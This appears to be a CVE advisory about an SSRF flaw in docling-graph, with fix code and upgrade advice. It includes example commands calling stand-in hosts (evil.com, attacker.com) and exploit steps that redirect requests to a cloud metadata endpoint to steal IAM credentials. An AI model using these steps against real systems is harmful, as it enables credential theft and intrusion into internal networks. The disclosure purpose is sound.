Listen to this Post
How the mentioned CVE works (technical details):
The vulnerability resides in the `URLInputHandler` class within docling_graph/core/input/handlers.py. This handler processes user-supplied URLs from the `–source` CLI argument or `PipelineConfig.source` API parameter. The `URLValidator` only validates the URL scheme (e.g., http/https) and checks for a non-empty `netloc` – it performs no IP address validation whatsoever. As a result, an attacker can supply a URL that resolves to private, loopback, or link-local IP addresses without any blocking. Additionally, the `requests.head()` method is called with allow_redirects=True, which follows HTTP redirects automatically. An attacker can use an external URL that returns a `302` or `301` redirect to an internal endpoint (e.g., http://169.254.169.254/latest/meta-data/`). Because redirects are followed without re-validation, the request reaches internal services. The library makes HTTP GET/HEAD requests to the final resolved IP, enabling Server-Side Request Forgery (SSRF). Attackers can reach cloud metadata endpoints (169.254.169.254), loopback (127.0.0.1), and private network ranges (10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16). This is especially dangerous in multi-tenant pipelines or server-side automation where untrusted users control the source URL.
<h2 style="color: blue;">dailycve form:</h2>
Platform: docling-graph
Version: <1.5.1
Vulnerability: SSRF via URL
Severity: Critical
date: 2025-01-05
<h2 style="color: blue;">Prediction: 2025-01-10</h2>
<h2 style="color: blue;">What Undercode Say:</h2>
Check if docling-graph is vulnerable (version <1.5.1)
pip show docling-graph | grep Version
Simulate the vulnerable behavior (manual test)
python3 -c "
import requests
The vulnerable code allowed redirects to internal IPs
url = 'http://evil.com/redirect-to-metadata'
Attacker sets up a redirect to 169.254.169.254
response = requests.head(url, allow_redirects=True)
print(response.url) Would show internal endpoint
"
Safe validation code from patch
python3 -c "
import ipaddress, socket
def is_private(hostname):
ip = socket.gethostbyname(hostname)
return ipaddress.ip_address(ip).is_private
print(is_private('169.254.169.254')) True -> blocked
"
<h2 style="color: blue;">Exploit:</h2>
1. Attacker controls `--source` argument: `docling-graph --source http://attacker.com/redirect`
2. Attacker hosts a server returning HTTP 302 redirect to `http://169.254.169.254/latest/meta-data/iam/security-credentials/`
<h2 style="color: blue;">3. `requests.head(..., allow_redirects=True)` follows redirect to metadata endpoint.</h2>
4. Library fetches internal data and returns it to attacker via error messages or document output.
5. Alternative: direct URL like `http://192.168.1.1/admin` – no validation blocks it.
Protection from this CVE:
- Immediate upgrade: `pip install --upgrade docling-graph to v1.5.1 or higher.
– If upgrade not possible: Never pass untrusted URLs to `–source` or PipelineConfig.source. Use only trusted internal sources.
– Patch details: The fix adds `ipaddress` and `socket.gethostbyname()` validation before any request, blocks private/loopback/link-local/reserved addresses, and sets `allow_redirects=False` with explicit validation of `Location` header before following any redirect.
Impact:
- Confidentiality: Leak of cloud IAM credentials (AWS, GCP, Azure metadata), internal service data, configuration files, and private network information.
- Integrity: Potential modification of internal resources if vulnerable endpoints support write operations (e.g., internal APIs).
- Availability: Could cause denial-of-service by targeting internal services or self-requests (loopback amplification).
- Scope: All multi-tenant deployments using docling-graph to process user-supplied URLs are affected. Attackers can pivot to internal networks, bypass firewalls, and escalate privileges via stolen credentials.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
